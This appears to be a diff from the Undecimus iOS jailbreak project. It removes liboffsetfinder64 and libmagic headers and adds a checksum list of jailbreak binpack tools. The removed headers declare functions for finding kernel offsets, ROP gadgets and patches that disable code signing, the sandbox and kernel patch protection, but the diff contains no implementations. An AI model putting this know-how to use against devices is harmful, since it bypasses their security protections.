-        offsetfinder64(const char *filename, uint64_t kslide = 0, tristate haveSymbols = kuninitialized);
-        offsetfinder64(void* buf, size_t size, uint64_t kslide, tristate haveSymbols = kfalse);
-        const void *kdata();
-        patchfinder64::loc_t find_entry();
-        patchfinder64::loc_t find_base();
-        const std::vector<patchfinder64::text_t> &segments(){return _segments;};
-        bool haveSymbols();
-        
-        patchfinder64::loc_t memmem(const void *little, size_t little_len);
-        uint64_t             deref(patchfinder64::loc_t pos);
-        
-        patchfinder64::loc_t find_sym(const char *sym);
-        patchfinder64::loc_t find_syscall0();
-        uint64_t             find_register_value(patchfinder64::loc_t where, int reg, patchfinder64::loc_t startAddr = 0);
-        
-        /*------------------------ v0rtex -------------------------- */
-        patchfinder64::loc_t find_zone_map();
-        patchfinder64::loc_t find_kernel_map();
-        patchfinder64::loc_t find_kernel_task();
-        patchfinder64::loc_t find_realhost();
-        patchfinder64::loc_t find_bzero();
-        patchfinder64::loc_t find_bcopy();
-        patchfinder64::loc_t find_copyout();
-        patchfinder64::loc_t find_copyin();
-        patchfinder64::loc_t find_ipc_port_alloc_special();
-        patchfinder64::loc_t find_ipc_kobject_set();
-        patchfinder64::loc_t find_ipc_port_make_send();
-        patchfinder64::loc_t find_chgproccnt();
-        patchfinder64::loc_t find_kauth_cred_ref();
-        patchfinder64::loc_t find_osserializer_serialize();
-        uint32_t             find_vtab_get_external_trap_for_index();
-        uint32_t             find_vtab_get_retain_count();
-        uint32_t             find_iouserclient_ipc();
-        uint32_t             find_ipc_space_is_task();
-        uint32_t             find_ipc_space_is_task_11();
-        uint32_t             find_proc_ucred();
-        uint32_t             find_task_bsd_info();
-        uint32_t             find_vm_map_hdr();
-        uint32_t             find_task_itk_self();
-        uint32_t             find_task_itk_registered();
-        uint32_t             find_sizeof_task();
-        
-        patchfinder64::loc_t find_rop_add_x0_x0_0x10();
-        patchfinder64::loc_t find_rop_ldr_x0_x0_0x10();
-        patchfinder64::loc_t find_exec(std::function<bool(patchfinder64::insn &i)>cmpfunc);
-        
-        
-        /*------------------------ kernelpatches -------------------------- */
-        patchfinder64::patch find_i_can_has_debugger_patch_off();
-        patchfinder64::patch find_lwvm_patch_offsets();
-        patchfinder64::patch find_remount_patch_offset();
-        std::vector<patchfinder64::patch> find_nosuid_off();
-        patchfinder64::patch find_proc_enforce();
-        patchfinder64::patch find_amfi_patch_offsets();
-        patchfinder64::patch find_cs_enforcement_disable_amfi();
-        patchfinder64::patch find_amfi_substrate_patch();
-        patchfinder64::patch find_sandbox_patch();
-        patchfinder64::loc_t find_sbops();
-        patchfinder64::patch find_nonceEnabler_patch();
-        patchfinder64::patch find_nonceEnabler_patch_nosym();
-
-        
-        /*------------------------ KPP bypass -------------------------- */
-        patchfinder64::loc_t find_gPhysBase();
-        patchfinder64::loc_t find_gPhysBase_nosym();
-        patchfinder64::loc_t find_kernel_pmap();
-        patchfinder64::loc_t find_kernel_pmap_nosym();
-        patchfinder64::loc_t find_cpacr_write();
-        patchfinder64::loc_t find_idlesleep_str_loc();
-        patchfinder64::loc_t find_deepsleep_str_loc();
-
-        /*------------------------ Util -------------------------- */
-        patchfinder64::loc_t find_rootvnode();
-        patchfinder64::loc_t find_allproc();
-        
-        
-        ~offsetfinder64();
-    };
-}
-
-
-
-#endif /* offsetfinder64_hpp */

Undecimus/include/liboffsetfinder64/liboffsetfinder64_common.h

@@ -1,30 +0,0 @@
-//
-//  liboffsetfinder64_common.h
-//  liboffsetfinder64
-//
-//  Created by tihmstar on 09.03.18.
-//  Copyright © 2018 tihmstar. All rights reserved.
-//
-
-#ifndef liboffsetfinder64_common_h
-#define liboffsetfinder64_common_h
-
-#include <stdint.h>
-#include <vector>
-
-namespace tihmstar{
-    namespace patchfinder64{
-        typedef uint8_t* loc_t;
-        typedef uint64_t offset_t;
-        
-        struct text_t{
-            patchfinder64::loc_t map;
-            size_t size;
-            patchfinder64::loc_t base;
-            bool isExec;
-        };
-        using segment_t = std::vector<tihmstar::patchfinder64::text_t>;
-    }
-}
-
-#endif /* liboffsetfinder64_common_h */

Undecimus/include/liboffsetfinder64/patch.hpp

@@ -1,36 +0,0 @@
-//
-//  patch.hpp
-//  liboffsetfinder64
-//
-//  Created by tihmstar on 09.03.18.
-//  Copyright © 2018 tihmstar. All rights reserved.
-//
-
-#ifndef patch_hpp
-#define patch_hpp
-
-#include <liboffsetfinder64/liboffsetfinder64_common.h>
-#include <stdlib.h>
-#include <string.h>
-#include <stdio.h>
-
-namespace tihmstar {
-    namespace patchfinder64{
-        
-        class patch{
-            bool _slideme;
-            void(*_slidefunc)(class patch *patch, uint64_t slide);
-        public:
-            const loc_t _location;
-            const void *_patch;
-            const size_t _patchSize;
-            patch(loc_t location, const void *patch, size_t patchSize, void(*slidefunc)(class patch *patch, uint64_t slide) = NULL);
-            patch(const patch& cpy);
-            void slide(uint64_t slide);
-            ~patch();
-        };
-        
-    }
-}
-
-#endif /* patch_hpp */

Undecimus/include/magic.h

@@ -1,158 +0,0 @@
-/*
- * Copyright (c) Christos Zoulas 2003.
- * All Rights Reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the above copyright
- *    notice immediately at the beginning of the file, without modification,
- *    this list of conditions, and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- *
- * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR
- * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- */
-#ifndef _MAGIC_H
-#define _MAGIC_H
-
-#include <sys/types.h>
-
-#define	MAGIC_NONE		0x0000000 /* No flags */
-#define	MAGIC_DEBUG		0x0000001 /* Turn on debugging */
-#define	MAGIC_SYMLINK		0x0000002 /* Follow symlinks */
-#define	MAGIC_COMPRESS		0x0000004 /* Check inside compressed files */
-#define	MAGIC_DEVICES		0x0000008 /* Look at the contents of devices */
-#define	MAGIC_MIME_TYPE		0x0000010 /* Return the MIME type */
-#define	MAGIC_CONTINUE		0x0000020 /* Return all matches */
-#define	MAGIC_CHECK		0x0000040 /* Print warnings to stderr */
-#define	MAGIC_PRESERVE_ATIME	0x0000080 /* Restore access time on exit */
-#define	MAGIC_RAW		0x0000100 /* Don't convert unprintable chars */
-#define	MAGIC_ERROR		0x0000200 /* Handle ENOENT etc as real errors */
-#define	MAGIC_MIME_ENCODING	0x0000400 /* Return the MIME encoding */
-#define MAGIC_MIME		(MAGIC_MIME_TYPE|MAGIC_MIME_ENCODING)
-#define	MAGIC_APPLE		0x0000800 /* Return the Apple creator/type */
-#define	MAGIC_EXTENSION		0x1000000 /* Return a /-separated list of
-					   * extensions */
-#define MAGIC_COMPRESS_TRANSP	0x2000000 /* Check inside compressed files
-					   * but not report compression */
-#define MAGIC_NODESC		(MAGIC_EXTENSION|MAGIC_MIME|MAGIC_APPLE)
-
-#define	MAGIC_NO_CHECK_COMPRESS	0x0001000 /* Don't check for compressed files */
-#define	MAGIC_NO_CHECK_TAR	0x0002000 /* Don't check for tar files */
-#define	MAGIC_NO_CHECK_SOFT	0x0004000 /* Don't check magic entries */
-#define	MAGIC_NO_CHECK_APPTYPE	0x0008000 /* Don't check application type */
-#define	MAGIC_NO_CHECK_ELF	0x0010000 /* Don't check for elf details */
-#define	MAGIC_NO_CHECK_TEXT	0x0020000 /* Don't check for text files */
-#define	MAGIC_NO_CHECK_CDF	0x0040000 /* Don't check for cdf files */
-#define	MAGIC_NO_CHECK_TOKENS	0x0100000 /* Don't check tokens */
-#define MAGIC_NO_CHECK_ENCODING 0x0200000 /* Don't check text encodings */
-#define MAGIC_NO_CHECK_JSON	0x0400000 /* Don't check for JSON files */
-
-/* No built-in tests; only consult the magic file */
-#define MAGIC_NO_CHECK_BUILTIN	( \
-	MAGIC_NO_CHECK_COMPRESS	| \
-	MAGIC_NO_CHECK_TAR	| \
-/*	MAGIC_NO_CHECK_SOFT	| */ \
-	MAGIC_NO_CHECK_APPTYPE	| \
-	MAGIC_NO_CHECK_ELF	| \
-	MAGIC_NO_CHECK_TEXT	| \
-	MAGIC_NO_CHECK_CDF	| \
-	MAGIC_NO_CHECK_TOKENS	| \
-	MAGIC_NO_CHECK_ENCODING	| \
-	MAGIC_NO_CHECK_JSON	| \
-	0			  \
-)
-
-#define MAGIC_SNPRINTB "\177\020\
-b\0debug\0\
-b\1symlink\0\
-b\2compress\0\
-b\3devices\0\
-b\4mime_type\0\
-b\5continue\0\
-b\6check\0\
-b\7preserve_atime\0\
-b\10raw\0\
-b\11error\0\
-b\12mime_encoding\0\
-b\13apple\0\
-b\14no_check_compress\0\
-b\15no_check_tar\0\
-b\16no_check_soft\0\
-b\17no_check_sapptype\0\
-b\20no_check_elf\0\
-b\21no_check_text\0\
-b\22no_check_cdf\0\
-b\23no_check_reserved0\0\
-b\24no_check_tokens\0\
-b\25no_check_encoding\0\
-b\26no_check_json\0\
-b\27no_check_reserved2\0\
-b\30extension\0\
-b\31transp_compression\0\
-"
-
-/* Defined for backwards compatibility (renamed) */
-#define	MAGIC_NO_CHECK_ASCII	MAGIC_NO_CHECK_TEXT
-
-/* Defined for backwards compatibility; do nothing */
-#define	MAGIC_NO_CHECK_FORTRAN	0x000000 /* Don't check ascii/fortran */
-#define	MAGIC_NO_CHECK_TROFF	0x000000 /* Don't check ascii/troff */
-
-#define MAGIC_VERSION		535	/* This implementation */
-
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-typedef struct magic_set *magic_t;
-magic_t magic_open(int);
-void magic_close(magic_t);
-
-const char *magic_getpath(const char *, int);
-const char *magic_file(magic_t, const char *);
-const char *magic_descriptor(magic_t, int);
-const char *magic_buffer(magic_t, const void *, size_t);
-
-const char *magic_error(magic_t);
-int magic_getflags(magic_t);
-int magic_setflags(magic_t, int);
-
-int magic_version(void);
-int magic_load(magic_t, const char *);
-int magic_load_buffers(magic_t, void **, size_t *, size_t);
-
-int magic_compile(magic_t, const char *);
-int magic_check(magic_t, const char *);
-int magic_list(magic_t, const char *);
-int magic_errno(magic_t);
-
-#define MAGIC_PARAM_INDIR_MAX		0
-#define MAGIC_PARAM_NAME_MAX		1
-#define MAGIC_PARAM_ELF_PHNUM_MAX	2
-#define MAGIC_PARAM_ELF_SHNUM_MAX	3
-#define MAGIC_PARAM_ELF_NOTES_MAX	4
-#define MAGIC_PARAM_REGEX_MAX		5
-#define	MAGIC_PARAM_BYTES_MAX		6
-
-int magic_setparam(magic_t, int, const void *);
-int magic_getparam(magic_t, int, void *);
-
-#ifdef __cplusplus
-};
-#endif
-
-#endif /* _MAGIC_H */

Undecimus/resources/binpack64-256.md5sums

@@ -0,0 +1,262 @@
+b898b8bcd8656374448051a69057521d  ./usr/bin/tee
+2703abe4fb5a83025c1b9476ff76bd33  ./usr/bin/split
+b710863f5f7acf5212de2ae187a88036  ./usr/bin/vim
+924eba52787a353e3fc6238528bc8b57  ./usr/bin/hexdump
+50ba68b0d76faecb0ea94b70a59f299a  ./usr/bin/nonceutil
+f03b02a469fe0f346e44db75a1fc47ef  ./usr/bin/lsmp
+a0b9f9016ccade288455b7141e1a693a  ./usr/bin/vm_stat
+7a503e87e55cee7427f94c5046f602d8  ./usr/bin/syslog
+dd692a7b33f7478497f8c1b68755c477  ./usr/bin/du
+636437c879c120f204305669342a8294  ./usr/bin/fs_usage
+5eab0aa90c966a26d7f2d912bcd19e74  ./usr/bin/renice
+7a747035cf06761640e2bd1121a9fed7  ./usr/bin/xxd
+33785345f40bdad328c2a79f013e91e8  ./usr/bin/sc_usage
+58041d4cc703a25dc41d5b5e49994da3  ./usr/bin/less
+9c3b5ece12be439690b6f0a021dde9e3  ./usr/bin/inject
+65cf7456fbf76bdb3fffadf765c3e54a  ./usr/bin/sed
+8f4cfcd2a709e88b88504b82ff358d65  ./usr/bin/nano
+07d32b3046248014cfaa0e1f3a489bdb  ./usr/bin/tset
+63e15286116be714262cb697a7517128  ./usr/bin/seq
+e65a3eeaeea8336154f8c7f9c5bf0018  ./usr/bin/uname
+e4e05c7bf0831c52dd409dbe0d2f660e  ./usr/bin/uicache
+b902b099b0b3f067165fe0baef133a69  ./usr/bin/reset
+4f01671c0ae2083b07d1ecdea264964b  ./usr/bin/wc
+fd17aa563a90ced7ef7d2342aec7e280  ./usr/bin/gzip
+f89a4d1a23bc10e6e10c8f1b1bcaa652  ./usr/bin/ldid3
+2629d71e6c09495a482270544c60b5a5  ./usr/bin/printf
+c653ea9550bad9b55c97d3b1e90b8f69  ./usr/bin/ldid2
+42c0b3b435c28cec0a707dc9802cfed7  ./usr/bin/tail
+b86021f1c7316b66acd50abfedd594c2  ./usr/bin/grep
+e92491131960f0005f3f7ca416ee9236  ./usr/bin/script
+9efbb27fe365cddcb005578bd7ef7a65  ./usr/bin/more
+2fee7eacb33519aa2996cc2b83a6d357  ./usr/bin/time
+39c15e53f0dd82a58012d1d0181905e1  ./usr/bin/plconvert
+8eb822233be91c75570479c3073a5b3d  ./usr/bin/head
+3bf9386f7d05055686a188718b6c12c2  ./usr/bin/clear
+f8778ec9c9faa44538b0c318624035c3  ./usr/bin/killall
+6610423671919d8e6f8588146711bd13  ./usr/bin/stat
+9f6d23b3158fd3f8a0fb900beabaa5f1  ./usr/bin/snappy
+a806f7b0dc5c4fd3d8e002afa16fadc3  ./usr/bin/sqlite3
+cdb0f23de81daad4e560ebd59c8de355  ./usr/bin/screen
+07a9b81c90872a25766127a840a14da6  ./usr/bin/arch
+50b64b8b88be46ef32d56f081542aa8c  ./usr/bin/cut
+0a740c42b89808c236a07a51fe5a814d  ./usr/bin/xargs
+4433ef936563f2838b09305737851015  ./usr/bin/what
+7786eabe3fe5b6b4180ced0cf4602502  ./usr/bin/ldid
+c41791441994916f3346f2f669f7bca2  ./usr/bin/chflags
+a97084e55faa35ff653099171312bb9b  ./usr/bin/id
+80b33297033bd59ae090ebba1ec9b67a  ./usr/bin/find
+5e84a2de4d32118d6c4adcb2e897f801  ./usr/bin/scp
+65fa4d06e93e3f9239ec284a8cafc279  ./usr/bin/true
+c32656a75f5e24d003683d8af58ca6d1  ./usr/bin/hostinfo
+b0bc120ffd09ddc8bc288556e4e238f4  ./usr/bin/tar
+d272b6b9ee40350bc868786ab6863024  ./usr/bin/false
+202fe8e6692a3a180cf0d92a16275dfc  ./usr/bin/login
+d2d12e8f4cfae79936803eaa78a6c2e9  ./usr/bin/which
+a098a6ea3245b6e32b2d6085bf88f46a  ./usr/bin/passwd
+23390a4a27a63ae1026e0d4640e74e97  ./usr/bin/nohup
+c9655b6dd73a182160636015270fb315  ./usr/bin/w
+110eecf0ee42142c045065003de6da8d  ./usr/bin/gunzip
+3444747dd9c4f6a5207af74622318d1f  ./usr/sbin/joreg
+9277c487d0a37255dba1dc8edbb14646  ./usr/sbin/ioreg
+5e0ea2ba00edd93b93c489fff5cf673e  ./usr/sbin/sysctl
+a946312719036084be1584f559b2ad93  ./usr/sbin/taskpolicy
+d96c5cae510321ceb1de66a8e8a2bc47  ./usr/sbin/netstat
+ade27f5ac9bd41b1f6966829a8ae320f  ./usr/sbin/ltop
+5786e43b57cc62e23931b319b91a8085  ./usr/sbin/chown
+bfe6c05f61efb46bcd4af932a504e6e6  ./usr/sbin/kextstat
+2d407928f102245200b62813aa33be3a  ./usr/local/bin/wget
+70daec5f62c7801f4494df325a53c441  ./usr/local/bin/jtool2
+b95d60ad4d5812bae3eddd7c28647063  ./usr/local/bin/dbclient
+ded12835bcef335967e2165d6b0e744a  ./usr/local/bin/filemon
+82b62dd019b9f24c9e7cd6a6c2140084  ./usr/local/bin/dropbear
+9886346e798d3fd0ca2535f599bffa0e  ./usr/local/bin/procexp
+70da97361f47e94787937494e8653e77  ./usr/local/bin/jtool
+1eb37e4f8d302d259fb8d7b16985acfb  ./usr/local/bin/dropbearkey
+4f3fb0098020807cdd741f51dd1663b3  ./usr/local/bin/jlutil
+94143bce6a7b0279a2db88ce2c3e3fdb  ./usr/local/bin/joker
+bfa7e6f6b1c4f2044457101a6bc319c8  ./usr/local/bin/dropbearconvert
+a115f8ee5627857f5da055a1a8e9056c  ./usr/local/bin/dropbear.orig
+d09a8eba7adbcf9417c48ed83928753b  ./usr/local/bin/procexp.ent
+44298a30dfedbb312ba3923716aa61a0  ./usr/local/lib/zsh/5.0.8/zsh/termcap.so
+d0b05ff80a5f5470a77740714735c573  ./usr/local/lib/zsh/5.0.8/zsh/zleparameter.so
+d8c7842dca4e2b405ce8ab605aa78594  ./usr/local/lib/zsh/5.0.8/zsh/example.so
+73ae237bf2dafc21cef52e3b04bcd90d  ./usr/local/lib/zsh/5.0.8/zsh/tcp.so
+23586b85e7444fe401672bdca5585e64  ./usr/local/lib/zsh/5.0.8/zsh/newuser.so
+705963ad326169b2b1a3a517b05765d7  ./usr/local/lib/zsh/5.0.8/zsh/deltochar.so
+714cfac68394abc786f32e96056a98a6  ./usr/local/lib/zsh/5.0.8/zsh/complete.so
+f25da108adc8701d153c9da648735307  ./usr/local/lib/zsh/5.0.8/zsh/mapfile.so
+65c97546fd24f08f90f4b49ce8632c64  ./usr/local/lib/zsh/5.0.8/zsh/stat.so
+b66cfb813e273d2ea24f585a9d07e2e0  ./usr/local/lib/zsh/5.0.8/zsh/compctl.so
+da02e032689685300c6c8a760d119066  ./usr/local/lib/zsh/5.0.8/zsh/zselect.so
+fc34fea197cfac379678b83ccaff6a1b  ./usr/local/lib/zsh/5.0.8/zsh/parameter.so
+63231fa531348d09c55eff734e306e18  ./usr/local/lib/zsh/5.0.8/zsh/datetime.so
+f91108fc9fb83cc2138f9d1da7487b29  ./usr/local/lib/zsh/5.0.8/zsh/socket.so
+91f38fd37f10e3f35dbcbb49b8adfb0a  ./usr/local/lib/zsh/5.0.8/zsh/terminfo.so
+deb70a41a405bb0824436ad028c556b6  ./usr/local/lib/zsh/5.0.8/zsh/clone.so
+9d3559e577bfca109520e4f0bad491ba  ./usr/local/lib/zsh/5.0.8/zsh/regex.so
+f12d65d38fbe3c1db7b7d65d13a25e0c  ./usr/local/lib/zsh/5.0.8/zsh/attr.so
+d16c5f028e26d507cdb8af9f165f14f8  ./usr/local/lib/zsh/5.0.8/zsh/curses.so
+91f32f5cb48390222c22ed8028e55d90  ./usr/local/lib/zsh/5.0.8/zsh/files.so
+eaf924f4282275441520d82567069883  ./usr/local/lib/zsh/5.0.8/zsh/system.so
+24a2ba2b1826a6e8990b04d9bc43e316  ./usr/local/lib/zsh/5.0.8/zsh/zpty.so
+23cc2ecf2e19f32f8eb6f9d7a37e1706  ./usr/local/lib/zsh/5.0.8/zsh/zle.so
+4d094b2b38db4fd73ae574befb25204e  ./usr/local/lib/zsh/5.0.8/zsh/mathfunc.so
+bec6c7e86f26a77b9524ed128da4b4d9  ./usr/local/lib/zsh/5.0.8/zsh/zutil.so
+2ae606823ae7e68d3af3bb351a19b437  ./usr/local/lib/zsh/5.0.8/zsh/complist.so
+c6a1d10d2211feb80284e81186caa6be  ./usr/local/lib/zsh/5.0.8/zsh/zftp.so
+7f3430e22eb6b38aa117ee4ed9352cee  ./usr/local/lib/zsh/5.0.8/zsh/cap.so
+b513edef71f83a0254ee3f78539a1240  ./usr/local/lib/zsh/5.0.8/zsh/computil.so
+fdba1d6dda089229cdaa4a10f621b703  ./usr/local/lib/zsh/5.0.8/zsh/zprof.so
+68fc31400366cc71bf7f7e2177ea6368  ./usr/local/lib/zsh/5.0.8/zsh/langinfo.so
+fa2279010eb25eb9658280d4e8741a4c  ./usr/share/terminfo/61/ansi80x50-mono
+c835906031322f6793d0bba8a4024cf4  ./usr/share/terminfo/61/ansi+idl1
+3b55b40fd24d7095314b9c3571aac6fb  ./usr/share/terminfo/61/ansil
+68354f5acab5acd36a028df8ef111944  ./usr/share/terminfo/61/ansi+idc
+3ae2c75389debb39daa93a37d0a05592  ./usr/share/terminfo/61/ansiw
+4ef30ab8d7c15a62823e5f4264f6d62d  ./usr/share/terminfo/61/ansi80x30
+0929a9ac82bd6cb0238dfb7577b8240f  ./usr/share/terminfo/61/ansi-mono
+12c43baa349979c093c1743a7489d8ee  ./usr/share/terminfo/61/ansi+pp
+41573351ca6e86546bd1a58cdbf5cd62  ./usr/share/terminfo/61/ansi+idl
+fa2279010eb25eb9658280d4e8741a4c  ./usr/share/terminfo/61/ansil-mono
+586b7d053f8a935202bc95bd769ee4f3  ./usr/share/terminfo/61/ansi80x30-mono
+3ae2c75389debb39daa93a37d0a05592  ./usr/share/terminfo/61/ansi80x25-raw
+71a5dd341d754460eb189f73779feb41  ./usr/share/terminfo/61/ansi+csr
+30ef341210e5227e41eaff5b83fac717  ./usr/share/terminfo/61/ansi-generic
+cf35f34c8755efb774005f800afab654  ./usr/share/terminfo/61/ansi+sgr
+6e327b6172dd4886024fd780797da60a  ./usr/share/terminfo/61/ansi+cup
+a811d944eb78b2a1f97aa6578dca08fa  ./usr/share/terminfo/61/ansi-emx
+017e3893644413c3d4446ac47c93951f  ./usr/share/terminfo/61/ansi+sgrbold
+0afdcc1032306d8d3ea05def04340d21  ./usr/share/terminfo/61/ansi+sgrul
+418c636af2942a1462885a6b667825a7  ./usr/share/terminfo/61/ansi80x60-mono
+5ab0fa91be25a2e1005fcd94dc9dd469  ./usr/share/terminfo/61/ansi+sgrso
+6b3a86ff2f1b95acfdd820fbf8750b01  ./usr/share/terminfo/61/ansi
+f18d72643477964bafbb499a518afab3  ./usr/share/terminfo/61/ansi-color-2-emx
+5cc9c4e94f47197a1171e8841c0909a6  ./usr/share/terminfo/61/ansis-mono
+bd5a24c27f2aae15e7c8616478b35177  ./usr/share/terminfo/61/ansi-color-3-emx
+47a77469940121acd86a1b82db198f3b  ./usr/share/terminfo/61/ansisysk
+6871af613871edf164a0656f20dc2c8c  ./usr/share/terminfo/61/ansi43m
+042f8da76683abcdace3439800571223  ./usr/share/terminfo/61/ansi-mtabs
+33b216e8fec086dbe4c884aa7b566d5b  ./usr/share/terminfo/61/ansi+sgrdim
+5eb691998583e67c1d1d66f6d1b065ba  ./usr/share/terminfo/61/ansi80x25
+38ad8b0dad6aab8bd2016f70a99cd5b0  ./usr/share/terminfo/61/ansi+erase
+aa05b8d0aa5e705fa2ad93378fd63f6e  ./usr/share/terminfo/61/ansi+rep
+5eb691998583e67c1d1d66f6d1b065ba  ./usr/share/terminfo/61/ansis
+3b55b40fd24d7095314b9c3571aac6fb  ./usr/share/terminfo/61/ansi80x50
+7183c55fa5ac8798a7dc32930ac058f5  ./usr/share/terminfo/61/ansi+tabs
+943d1287db33a09d31ba2ec571047807  ./usr/share/terminfo/61/ansi+local1
+c54fc1fd467518dae352dd8de6fade98  ./usr/share/terminfo/61/ansi80x60
+54f926c6f19b6d1f02ced3ec7dcc7d2d  ./usr/share/terminfo/61/ansi+rca
+c12e955efc5c4f813357a89fd90a84b3  ./usr/share/terminfo/61/ansi-mini
+908b80b219e9ae677f65aac5814a8aba  ./usr/share/terminfo/61/ansi+enq
+5b2a31e020e45acef8b3154423e36061  ./usr/share/terminfo/61/ansi-nt
+7a494b98caadb3132504382fe6ccd1e3  ./usr/share/terminfo/61/ansi77
+d59ad3dfe0d905f83febae83bbb6490d  ./usr/share/terminfo/61/ansi-mr
+c5195124980c2d8c2be86cbfa4c29390  ./usr/share/terminfo/61/ansi80x43-mono
+fccc68bc07c0961e088e0b327d585008  ./usr/share/terminfo/61/ansi.sys
+3f95bb59083f6458ee20714be2455c24  ./usr/share/terminfo/61/ansi.sys-old
+47a77469940121acd86a1b82db198f3b  ./usr/share/terminfo/61/ansi.sysk
+5cc9c4e94f47197a1171e8841c0909a6  ./usr/share/terminfo/61/ansi80x25-mono
+34b77e5af5db12946a3720cb7c72fbbc  ./usr/share/terminfo/61/ansi+inittabs
+fe8ccd619fa36730e1989be8bf64a880  ./usr/share/terminfo/61/ansi+local
+0929a9ac82bd6cb0238dfb7577b8240f  ./usr/share/terminfo/61/ansi-m
+e0a527902af2067e4b2d7233098a9544  ./usr/share/terminfo/61/ansi80x43
+acc9f736d0109a103776546ff99d4448  ./usr/share/terminfo/61/ansi+arrows
+758da19fa1ad8fa0aa8872d2fa4fabc2  ./usr/share/terminfo/73/screen-16color
+71191244af59a0bc0eff3cb7e5c6761a  ./usr/share/terminfo/73/screen2
+779220648133f21501a25a1d7f736ede  ./usr/share/terminfo/73/screen3
+6e536f3f0ca81e760cca30af42ef5ee5  ./usr/share/terminfo/73/screen-16color-bce-s
+acdec11a201772f9868008c9b35370a4  ./usr/share/terminfo/73/screen-256color-bce
+451f167847fa67389cf5d57ce1407e43  ./usr/share/terminfo/73/screen.rxvt
+24337a754ffdf33baa8f7833fec84a17  ./usr/share/terminfo/73/screen.xterm-r6
+2fdd2ae242a69fc6a6846adbad436bfb  ./usr/share/terminfo/73/screen-w
+1fc43105421912a088b1d94675f7fd05  ./usr/share/terminfo/73/screen.xterm-xfree86
+4209d2ad407722c4ee0d38679569633f  ./usr/share/terminfo/73/screen-16color-s
+6f004c8e3d5856b5522c8cecbc668ecd  ./usr/share/terminfo/73/screen.linux
+ac3ad0fb0869538166f5a12fbcfe0c21  ./usr/share/terminfo/73/screen-256color-bce-s
+206907aeaa38189a8b2e74feae020f91  ./usr/share/terminfo/73/screen
+1e076f070f12f1039f827e518717c5e0  ./usr/share/terminfo/73/screen-bce
+40e690ba777f5df6351949d569a0c419  ./usr/share/terminfo/73/screen-256color-s
+3b4151a6763a7d1439e8b1709325f123  ./usr/share/terminfo/73/screen.mlterm
+6db29fffc6c61f7ce0052805f9d997d9  ./usr/share/terminfo/73/screen-s
+06d68826ae2b44388d31bbf15bfc3ebf  ./usr/share/terminfo/73/screen.teraterm
+bc62056fcb4a9609cb0ce74bbf3fa5e8  ./usr/share/terminfo/73/screen-16color-bce
+1fc43105421912a088b1d94675f7fd05  ./usr/share/terminfo/73/screen.xterm-new
+ffb01624d78c3593c3a5c34624186a7d  ./usr/share/terminfo/73/screen-256color
+19c69a8a937560ae5f5f88b0fe6773a6  ./usr/share/terminfo/73/screen+fkeys
+6571655c5c8e2cdd82754860b0f12cf9  ./usr/share/terminfo/6c/linux-lat
+0a3b98f41dbaa4ec10b6b33e1f7e5fb8  ./usr/share/terminfo/6c/linux-koi8r
+53ab5f398fdf2fc9a04e3d443439c748  ./usr/share/terminfo/6c/linux-vt
+c908ab61179176e87feeffea61d48550  ./usr/share/terminfo/6c/linux-basic
+645999d4afb490d40ff6b55239ad8173  ./usr/share/terminfo/6c/linux
+3497148074bf923fb5947f332143b4dc  ./usr/share/terminfo/6c/linux-c-nc
+5f6c4c2e8b8176b5a75551a123d6a5c7  ./usr/share/terminfo/6c/linux2.6.26
+d430677ee48aaa29b1ec07856fadf1b3  ./usr/share/terminfo/6c/linux-c
+859f454b42150769255dcb99d7715769  ./usr/share/terminfo/6c/linux-m
+ef9a25f74c562344cc9840830df27ce9  ./usr/share/terminfo/6c/linux-nic
+1e2899cc9d0dbb7e97adc7c6117e296c  ./usr/share/terminfo/6c/linux-koi8
+a06a3fcbf8aebe420717a1933eb21572  ./usr/share/terminfo/76/vt100-putty
+5ab1f7397095f804dcb33dd95358ff71  ./usr/share/terminfo/76/vt100-nav-w
+4aaaf3867c2dd1faef92e6519d38e26e  ./usr/share/terminfo/76/vt100-s
+2cfff02a7d0fe4d1ae27b0127b9a7716  ./usr/share/terminfo/76/vt100+
+e49122999d1ba9ccbe2f7f56d706e897  ./usr/share/terminfo/76/vt100nam
+5619ee07eba86463eb529b11fa45b7a5  ./usr/share/terminfo/76/vt100-vb
+1da2593594b479b4ad1191724b755981  ./usr/share/terminfo/76/vt100+enq
+4aaaf3867c2dd1faef92e6519d38e26e  ./usr/share/terminfo/76/vt100-s-top
+f99eba18048c6edefef69b2aa6cf9671  ./usr/share/terminfo/76/vt100-nam-w
+3d6df1ce9053ede73fe26bbb393a2da4  ./usr/share/terminfo/76/vt100+fnkeys
+25cbb52e83f147f21489d20addde7cd1  ./usr/share/terminfo/76/vt100-w
+96300e9c1b0dea5f61383f5d22342ef3  ./usr/share/terminfo/76/vt100
+5ab1f7397095f804dcb33dd95358ff71  ./usr/share/terminfo/76/vt100-w-nav
+846029909338b3ee934e3cc1de3f3c0e  ./usr/share/terminfo/76/vt100-bot-s
+f99eba18048c6edefef69b2aa6cf9671  ./usr/share/terminfo/76/vt100-w-nam
+8fe8280e41916a873a0235c91308ebd2  ./usr/share/terminfo/76/vt100+pfkeys
+4aaaf3867c2dd1faef92e6519d38e26e  ./usr/share/terminfo/76/vt100-top-s
+76baa3a9460d6112ac20dbf6f58725c2  ./usr/share/terminfo/76/vt100-nav
+e49122999d1ba9ccbe2f7f56d706e897  ./usr/share/terminfo/76/vt100-nam
